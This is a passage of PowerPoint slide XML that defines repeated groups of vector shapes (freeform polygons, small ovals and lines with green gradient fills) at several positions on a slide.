              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5607782" y="1431509"/>
                <a:ext cx="2063750" cy="555625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60" y="22"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="80" y="43"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="22"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b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C7013">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="4C7013"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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434" name="Group 1749"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="5844320" y="1448972"/>
                <a:ext cx="1630363" cy="473075"/>
                <a:chOff x="2158" y="2963"/>
                <a:chExt cx="3583" cy="1038"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="435" name="Freeform 1750"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2158" y="2963"/>
                  <a:ext cx="3583" cy="962"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3583"/>
                    <a:gd name="T1" fmla="*/ 601 h 962"/>
                    <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                    <a:gd name="T3" fmla="*/ 0 h 962"/>
                    <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                    <a:gd name="T5" fmla="*/ 360 h 962"/>
                    <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                    <a:gd name="T7" fmla="*/ 962 h 962"/>
                    <a:gd name="T8" fmla="*/ 0 w 3583"/>
                    <a:gd name="T9" fmla="*/ 601 h 9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83"/>
                    <a:gd name="T16" fmla="*/ 0 h 962"/>
                    <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                    <a:gd name="T18" fmla="*/ 962 h 96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83" h="962">
                      <a:moveTo>
                        <a:pt x="0" y="601"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="2239" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3583" y="360"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="601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36" name="Freeform 1751"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3502" y="3323"/>
                  <a:ext cx="2239" cy="678"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2239"/>
                    <a:gd name="T1" fmla="*/ 602 h 678"/>
                    <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                    <a:gd name="T3" fmla="*/ 0 h 678"/>
                    <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                    <a:gd name="T5" fmla="*/ 75 h 678"/>
                    <a:gd name="T6" fmla="*/ 0 w 2239"/>
                    <a:gd name="T7" fmla="*/ 678 h 678"/>
                    <a:gd name="T8" fmla="*/ 0 w 2239"/>
                    <a:gd name="T9" fmla="*/ 602 h 67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39"/>
                    <a:gd name="T16" fmla="*/ 0 h 678"/>
                    <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                    <a:gd name="T18" fmla="*/ 678 h 67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39" h="678">
                      <a:moveTo>
                        <a:pt x="0" y="602"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="2239" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2239" y="75"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="678"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="602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6350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37" name="Freeform 1752"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2158" y="3564"/>
                  <a:ext cx="1344" cy="437"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1344"/>
                    <a:gd name="T1" fmla="*/ 0 h 437"/>
                    <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T3" fmla="*/ 361 h 437"/>
                    <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T5" fmla="*/ 437 h 437"/>
                    <a:gd name="T6" fmla="*/ 0 w 1344"/>
                    <a:gd name="T7" fmla="*/ 75 h 437"/>
                    <a:gd name="T8" fmla="*/ 0 w 1344"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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344"/>
                    <a:gd name="T16" fmla="*/ 0 h 437"/>
                    <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T18" fmla="*/ 437 h 4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344" h="437">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1344" y="361"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="437"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0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6350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38" name="Oval 1753"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2900" y="3679"/>
                  <a:ext cx="170" cy="4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39" name="Oval 1754"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3145" y="3613"/>
                  <a:ext cx="170" cy="4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40" name="Oval 1755"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3389" y="3547"/>
                  <a:ext cx="170" cy="47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41" name="Oval 1756"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3634" y="3481"/>
                  <a:ext cx="170" cy="47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42" name="Oval 1757"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3877" y="3417"/>
                  <a:ext cx="173" cy="4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43" name="Oval 1758"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4123" y="3351"/>
                  <a:ext cx="173" cy="4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44" name="Oval 1759"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4366" y="3285"/>
                  <a:ext cx="170" cy="47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45" name="Oval 1760"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4612" y="3219"/>
                  <a:ext cx="170" cy="47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46" name="Oval 1761"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4858" y="3155"/>
                  <a:ext cx="170" cy="4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47" name="Group 446"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5945235" y="2476470"/>
              <a:ext cx="2063750" cy="555625"/>
              <a:chOff x="5607782" y="1431509"/>
              <a:chExt cx="2063750" cy="555625"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="448" name="Freeform 2786"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5607782" y="1431509"/>
                <a:ext cx="2063750" cy="555625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60" y="22"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="80" y="43"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="22"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b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C7013">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="4C7013"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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449" name="Group 1749"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="5844320" y="1448972"/>
                <a:ext cx="1630363" cy="473075"/>
                <a:chOff x="2158" y="2963"/>
                <a:chExt cx="3583" cy="1038"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="450" name="Freeform 1750"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2158" y="2963"/>
                  <a:ext cx="3583" cy="962"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3583"/>
                    <a:gd name="T1" fmla="*/ 601 h 962"/>
                    <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                    <a:gd name="T3" fmla="*/ 0 h 962"/>
                    <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                    <a:gd name="T5" fmla="*/ 360 h 962"/>
                    <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                    <a:gd name="T7" fmla="*/ 962 h 962"/>
                    <a:gd name="T8" fmla="*/ 0 w 3583"/>
                    <a:gd name="T9" fmla="*/ 601 h 9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83"/>
                    <a:gd name="T16" fmla="*/ 0 h 962"/>
                    <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                    <a:gd name="T18" fmla="*/ 962 h 96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83" h="962">
                      <a:moveTo>
                        <a:pt x="0" y="601"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="2239" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3583" y="360"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="601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51" name="Freeform 1751"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3502" y="3323"/>
                  <a:ext cx="2239" cy="678"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2239"/>
                    <a:gd name="T1" fmla="*/ 602 h 678"/>
                    <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                    <a:gd name="T3" fmla="*/ 0 h 678"/>
                    <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                    <a:gd name="T5" fmla="*/ 75 h 678"/>
                    <a:gd name="T6" fmla="*/ 0 w 2239"/>
                    <a:gd name="T7" fmla="*/ 678 h 678"/>
                    <a:gd name="T8" fmla="*/ 0 w 2239"/>
                    <a:gd name="T9" fmla="*/ 602 h 67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39"/>
                    <a:gd name="T16" fmla="*/ 0 h 678"/>
                    <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                    <a:gd name="T18" fmla="*/ 678 h 67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39" h="678">
                      <a:moveTo>
                        <a:pt x="0" y="602"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="2239" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2239" y="75"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="678"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="602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6350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 1752"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2158" y="3564"/>
                  <a:ext cx="1344" cy="437"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1344"/>
                    <a:gd name="T1" fmla="*/ 0 h 437"/>
                    <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T3" fmla="*/ 361 h 437"/>
                    <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T5" fmla="*/ 437 h 437"/>
                    <a:gd name="T6" fmla="*/ 0 w 1344"/>
                    <a:gd name="T7" fmla="*/ 75 h 437"/>
                    <a:gd name="T8" fmla="*/ 0 w 1344"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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344"/>
                    <a:gd name="T16" fmla="*/ 0 h 437"/>
                    <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T18" fmla="*/ 437 h 4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344" h="437">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1344" y="361"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="437"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0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6350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Oval 1753"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2900" y="3679"/>
                  <a:ext cx="170" cy="4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54" name="Oval 1754"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3145" y="3613"/>
                  <a:ext cx="170" cy="4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55" name="Oval 1755"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3389" y="3547"/>
                  <a:ext cx="170" cy="47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56" name="Oval 1756"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3634" y="3481"/>
                  <a:ext cx="170" cy="47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Oval 1757"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3877" y="3417"/>
                  <a:ext cx="173" cy="4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58" name="Oval 1758"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4123" y="3351"/>
                  <a:ext cx="173" cy="4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59" name="Oval 1759"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4366" y="3285"/>
                  <a:ext cx="170" cy="47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Oval 1760"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4612" y="3219"/>
                  <a:ext cx="170" cy="47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Oval 1761"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4858" y="3155"/>
                  <a:ext cx="170" cy="4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462" name="Freeform 2786"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7081278" y="2801353"/>
              <a:ext cx="2063750" cy="555625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4C7013">
                    <a:gamma/>
                    <a:tint val="68627"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="4C7013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463" name="Group 1749"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="7317816" y="2818816"/>
              <a:ext cx="1630363" cy="473075"/>
              <a:chOff x="2158" y="2963"/>
              <a:chExt cx="3583" cy="1038"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="464" name="Freeform 1750"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="2963"/>
                <a:ext cx="3583" cy="962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 601 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 360 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 601 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="601"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="601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65" name="Freeform 1751"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3502" y="3323"/>
                <a:ext cx="2239" cy="678"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 602 h 678"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 678"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 75 h 678"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 678 h 678"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 602 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 678"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 678 h 6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9" h="678">
                    <a:moveTo>
                      <a:pt x="0" y="602"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="602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66" name="Freeform 1752"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="3564"/>
                <a:ext cx="1344" cy="437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 437"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 437"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 437 h 437"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 75 h 437"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 437"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 437 h 4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4" h="437">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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67" name="Oval 1753"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2900" y="3679"/>
                <a:ext cx="170" cy="4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68" name="Oval 1754"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3145" y="3613"/>
                <a:ext cx="170" cy="4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69" name="Oval 1755"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3389" y="3547"/>
                <a:ext cx="170" cy="4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0" name="Oval 1756"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3634" y="3481"/>
                <a:ext cx="170" cy="4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1" name="Oval 1757"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3877" y="3417"/>
                <a:ext cx="173" cy="4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2" name="Oval 1758"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4123" y="3351"/>
                <a:ext cx="173" cy="4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3" name="Oval 1759"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4366" y="3285"/>
                <a:ext cx="170" cy="4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4" name="Oval 1760"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4612" y="3219"/>
                <a:ext cx="170" cy="4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5" name="Oval 1761"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4858" y="3155"/>
                <a:ext cx="170" cy="4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476" name="Group 1762"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="8537016" y="2474328"/>
              <a:ext cx="314325" cy="560388"/>
              <a:chOff x="2738" y="59"/>
              <a:chExt cx="566" cy="1006"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="477" name="Line 1763"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="2853" y="535"/>
                <a:ext cx="54" cy="1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8" name="Line 1764"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="2853" y="548"/>
                <a:ext cx="54" cy="1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9" name="Freeform 1765"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2955" y="757"/>
                <a:ext cx="349" cy="308"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2268"/>
                  <a:gd name="T1" fmla="*/ 607 h 2003"/>
                  <a:gd name="T2" fmla="*/ 2268 w 2268"/>
                  <a:gd name="T3" fmla="*/ 0 h 2003"/>
                  <a:gd name="T4" fmla="*/ 2268 w 2268"/>
                  <a:gd name="T5" fmla="*/ 1396 h 2003"/>
                  <a:gd name="T6" fmla="*/ 5 w 2268"/>
                  <a:gd name="T7" fmla="*/ 2003 h 2003"/>
                  <a:gd name="T8" fmla="*/ 0 w 2268"/>
                  <a:gd name="T9" fmla="*/ 607 h 20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68"/>
                  <a:gd name="T16" fmla="*/ 0 h 2003"/>
                  <a:gd name="T17" fmla="*/ 2268 w 2268"/>
                  <a:gd name="T18" fmla="*/ 2003 h 200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68" h="2003">
                    <a:moveTo>
                      <a:pt x="0" y="607"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2268" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2268" y="1396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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0" name="Freeform 1766"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2749" y="795"/>
                <a:ext cx="207" cy="268"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1349"/>
                  <a:gd name="T1" fmla="*/ 359 h 1741"/>
                  <a:gd name="T2" fmla="*/ 0 w 1349"/>
                  <a:gd name="T3" fmla="*/ 0 h 1741"/>
                  <a:gd name="T4" fmla="*/ 2 w 1349"/>
                  <a:gd name="T5" fmla="*/ 1380 h 1741"/>
                  <a:gd name="T6" fmla="*/ 1349 w 1349"/>
                  <a:gd name="T7" fmla="*/ 1741 h 1741"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1349"/>
                  <a:gd name="T9" fmla="*/ 359 h 17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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 1741"/>
                  <a:gd name="T17" fmla="*/ 1349 w 1349"/>
                  <a:gd name="T18" fmla="*/ 1741 h 17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9" h="1741">
                    <a:moveTo>
                      <a:pt x="1344" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1349" y="1741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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1" name="Freeform 1767"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2749" y="701"/>
                <a:ext cx="555" cy="149"/>
              </a:xfrm>
              <a:custGeom>
